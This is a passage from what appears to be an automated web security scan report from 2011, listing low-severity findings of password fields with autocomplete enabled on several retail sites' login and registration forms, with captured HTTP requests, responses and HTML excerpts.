Path:	/accounts/account-sign-in.html

Issue detail

The page contains a form with the following action URL:

https://secure.bluenile.com/accounts/account-sign-in.html

The form contains the following password field with autocomplete enabled:

accountLogin.password

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=C17E9A3C5BCE364EF1C941E8BE0AB1C0

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:22:03 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=17D12AC0F69B7A9A14DCACE026AA9639; Path=/; Secure
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:22:04 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63175

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...
</p>
<form id="accountLoginForm" action="/accounts/account-sign-in.html" method="POST"><input id="formLogin" name="formLogin" type="hidden" value="false"/>
...[SNIP]...
</label>
<input id="accountLogin.password" name="accountLogin.password" class="account-password-input" type="password" value="" maxlength="30"/> <span class="instructions">
...[SNIP]...

14.17. https://secure.bluenile.com/accounts/account-sign-in.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.bluenile.com
Path:	/accounts/account-sign-in.html

Issue detail

The page contains a form with the following action URL:

https://secure.bluenile.com/accounts/account-sign-in.html;jsessionid=C4A385CE7874D0A2B551FC74E3744D04

The form contains the following password field with autocomplete enabled:

accountLogin.password

Request

Response

14.18. https://secure.orientaltrading.com/ui/userProfile/processRequest.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.orientaltrading.com
Path:	/ui/userProfile/processRequest.do

Issue detail

The page contains a form with the following action URL:

https://secure.orientaltrading.com/ui/userProfile/processRequest.do

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.19. http://shoprunner.force.com/content/JsContentElementsGNC previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL:

http://shoprunner.force.com/content/step1

The form contains the following password field with autocomplete enabled:

password2

Request

Response

14.20. http://shoprunner.force.com/content/JsContentElementsPET previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL:

http://shoprunner.force.com/content/step1

The form contains the following password field with autocomplete enabled:

password2

Request

Response

14.21. https://www.acehardware.com/checkout/index.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

https://www.acehardware.com/coreg/index.jsp

The form contains the following password fields with autocomplete enabled:

newPassword
newPassword2

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510830898}; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--Preview Time
...[SNIP]...
<tr>
                       <form name="newCustomer" onsubmit="valSignUp();return false;" action="/coreg/index.jsp" method="post">
                       <input type="hidden" name="step" value="signup">
...[SNIP]...
<br>
                           <input type="password" id="passwrd" size="18" name="newPassword" class="pagetext">
                           <br>
...[SNIP]...
<br>
                           <input type="password" id="confPasswrd" size="18" name="newPassword2" class="pagetext">


                                                                                                               <br>
...[SNIP]...

14.22. https://www.acehardware.com/checkout/index.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

https://www.acehardware.com/coreg/index.jsp

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.23. https://www.armaniexchange.com/account/login.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.armaniexchange.com
Path:	/account/login.do

Issue detail

The page contains a form with the following action URL:

https://www.armaniexchange.com/account/login.do?method=view

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /account/login.do?method=view HTTP/1.1
Host: www.armaniexchange.com
Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; s_cc=true; mbcs=6451B347-829F-5F10-0394-7AA048201BB1; fsr.s={"v":1,"rid":"1305510204631_768485","to":5,"c":"http://www.armaniexchange.com/category/womens.do","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1305510843196}; gpv_p4l=Womens; s_sq=mlax5prod%3D%2526pid%253DWomens%2526pidt%253D1%2526oid%253Dhttp%25253A//www.armaniexchange.com/account.do%25253Fmethod%25253Dstart%252526nav%25253D%2525252Fcategory%2525252Fid%2525252F100199%2526ot%253DA; customer=none; basket=none

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 02:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 02:13:15 GMT
Connection: keep-alive
Set-Cookie: customer=none; path=/; expires=Wed, 29-May-2013 02:13:14 GMT
Set-Cookie: basket=none; path=/; expires=Mon, 30-May-2011 02:13:14 GMT
Content-Length: 48782

<html>
<head>

<title>Designer Clothing at Armani Exchange</title>

...[SNIP]...
</tr>

<form name="accountRegisterForm" method="post" action="/account/login.do?method=view" id="mainForm">

<tr valign="top">
...[SNIP]...
<div><input type="password" name="loginPassword" maxlength="50" size="15" value="" class="loginmyaccount"></div>
...[SNIP]...

14.24. https://www.armaniexchange.com/account/login.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.armaniexchange.com
Path:	/account/login.do

Issue detail

The page contains a form with the following action URL:

https://www.armaniexchange.com/account/registerusername.do?method=submit

The form contains the following password fields with autocomplete enabled:

loginPassword
loginPasswordConfirm

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 02:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 02:13:15 GMT
Connection: keep-alive
Set-Cookie: customer=none; path=/; expires=Wed, 29-May-2013 02:13:14 GMT
Set-Cookie: basket=none; path=/; expires=Mon, 30-May-2011 02:13:14 GMT
Content-Length: 48782

<html>
<head>

<title>Designer Clothing at Armani Exchange</title>

...[SNIP]...
<td>

<form name="accountRegisterForm" method="post" action="/account/registerusername.do?method=submit" id="mainForm1">
<table width="310" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td><input type="password" name="loginPassword" maxlength="50" value="" class="loginmyaccount"></td>
...[SNIP]...
<td><input type="password" name="loginPasswordConfirm" maxlength="50" value="" class="loginmyaccount"></td>
...[SNIP]...

14.25. http://www.bluefly.com/myfly/login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/myfly/login.jsp

Issue detail

The page contains a form with the following action URL:

https://www.bluefly.com/myfly/login.jsp?_DARGS=/myfly/f_login.jsp.login

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.26. http://www.bluefly.com/myfly/login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/myfly/login.jsp

Issue detail

The page contains a form with the following action URL:

https://www.bluefly.com/myfly/login.jsp?_DARGS=/myfly/f_registration.jsp.myaccount_create

The form contains the following password fields with autocomplete enabled:

newpassword
confirmpassword

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www
...[SNIP]...
</div>
<form id="myaccount_create" name="myaccount_create" action="https://www.bluefly.com/myfly/login.jsp?_DARGS=/myfly/f_registration.jsp.myaccount_create" method="post"><input name="_dyncharset" value="ISO-8859-1" type="hidden">
...[SNIP]...

<input id="newpassword" maxlength="40" name="newpassword" value="" class="input" type="password"><input name="_D:newpassword" value=" " type="hidden">
...[SNIP]...

<input id="confirmpassword" maxlength="40" name="confirmpassword" value="" class="input" type="password"><input name="_D:confirmpassword" value=" " type="hidden">
...[SNIP]...

14.27. http://www.footlocker.com/login/login_form.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login_form.cfm

Issue detail

The page contains a form with the following action URL:

https://www.footlocker.com/login/login_action.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true

The form contains the following password field with autocomplete enabled:

login_password

Request

Response

14.28. https://www.footlocker.com/account/default.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default.cfm

Issue detail

The page contains a form with the following action URL:

https://www.footlocker.com/account/default.cfm?action=accountConfirm

The form contains the following password fields with autocomplete enabled:

password
confirmPassword

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>


<title>Foot Locker New Account
...[SNIP]...
<div class="box">
<form class="validateOnSubmit" name="accountCreateForm" method="POST" action="https://www.footlocker.com/account/default.cfm?action=accountConfirm" onsubmit="syncStateAndZipOnSubmitAction_ma()">
               <input type="hidden" name="requestKey" id="requestKey" value="C49C97B373">
...[SNIP]...
<td><input class="validate_required" type="password" name="password" size="30" maxlength="20" value=""></td>
...[SNIP]...
<td><input class="validate_required" type="password" name="confirmPassword" size="30" maxlength="20" value=""></td>
...[SNIP]...

14.29. https://www.footlocker.com/account/default/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default/

Issue detail

The page contains a form with the following action URL:

https://www.footlocker.com/account/default.cfm?action=accountSignIn

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.30. http://www.ftd.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.31. http://www.ftd.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.ftd.com/

The form contains the following password fields with autocomplete enabled:

password
password_ver

Request

Response

14.32. http://www.ftd.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.33. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.34. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL:

http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

The form contains the following password fields with autocomplete enabled:

password
password_ver

Request

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.35. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL:

https://ordering.ftd.com/528/signin/

The form contains the following password field with autocomplete enabled:

password

Request

Response

14.36. https://www.gnc.com/checkout/index.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.gnc.com
Path:	/checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

https://www.gnc.com/coreg/index.jsp

The form contains the following password field with autocomplete enabled:

password

Request

GET /checkout/index.jsp?process=orderTrackingLogin HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

14.37. https://www.guitarcenter.com/MyAccount/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.guitarcenter.com
Path:	/MyAccount/Login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.guitarcenter.com/MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx

The form contains the following password field with autocomplete enabled:

ctl00$CenterContent$ctl00$password

Request

GET /MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=5

Response

14.38. https://www.helzberg.com/account/login.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/account/login.do

Issue detail

The page contains a form with the following action URL:

https://www.helzberg.com/account/login.do?method=view

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /account/login.do?method=view HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305511291580}; s_sq=mlhelzbprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.helzberg.com/account.do%25253Fmethod%25253Dstart%2526ot%253DA; JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none

Response

14.39. https://www.orderhouse.com/default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.orderhouse.com
Path:	/default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.orderhouse.com/dp.aspx

The form contains the following password field with autocomplete enabled:

Skin$WB_POTID271$txtPassword

Request

GET /default.aspx HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:13 GMT
Content-Length: 65618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<body bgcolor="#003366" leftmargin="0" topmargin="0">

       <form name="aspnetForm" method="post" action="dp.aspx" id="aspnetForm">
<div>
...[SNIP]...
</span><input name="Skin$WB_POTID271$txtPassword" type="password" maxlength="16" id="Skin_WB_POTID271_txtPassword" onkeydown="javascript:Login(event)" style="font-size:XX-Small;height:17px;width:80px;" /></td>
...[SNIP]...

14.40. https://www.orderhouse.com/dp.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.orderhouse.com
Path:	/dp.aspx

Issue detail

The page contains a form with the following action URL:

https://www.orderhouse.com/dp.aspx?pgid=-1&sto=1

The form contains the following password field with autocomplete enabled:

Skin$WB_POTID271$txtPassword

Request

GET /dp.aspx?pgid=-1&sto=1 HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
Referer: https://www.orderhouse.com/dp.aspx?pgid=-22
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:09:50 GMT
Content-Length: 65680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<body bgcolor="#003366" leftmargin="0" topmargin="0">

       <form name="aspnetForm" method="post" action="dp.aspx?pgid=-1&sto=1" id="aspnetForm">
<div>
...[SNIP]...
</span><input name="Skin$WB_POTID271$txtPassword" type="password" maxlength="16" id="Skin_WB_POTID271_txtPassword" onkeydown="javascript:Login(event)" style="font-size:XX-Small;height:17px;width:80px;" /></td>
...[SNIP]...

14.41. https://www.orderhouse.com/dp.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.orderhouse.com
Path:	/dp.aspx

Issue detail

The page contains a form with the following action URL:

https://www.orderhouse.com/dp.aspx?pgid=-22

The form contains the following password fields with autocomplete enabled:

Skin$WB_POTID271$txtPassword
Skin$WB_POTIDneg4$txtPassword

Request

GET /dp.aspx?pgid=-22 HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
Referer: https://www.orderhouse.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
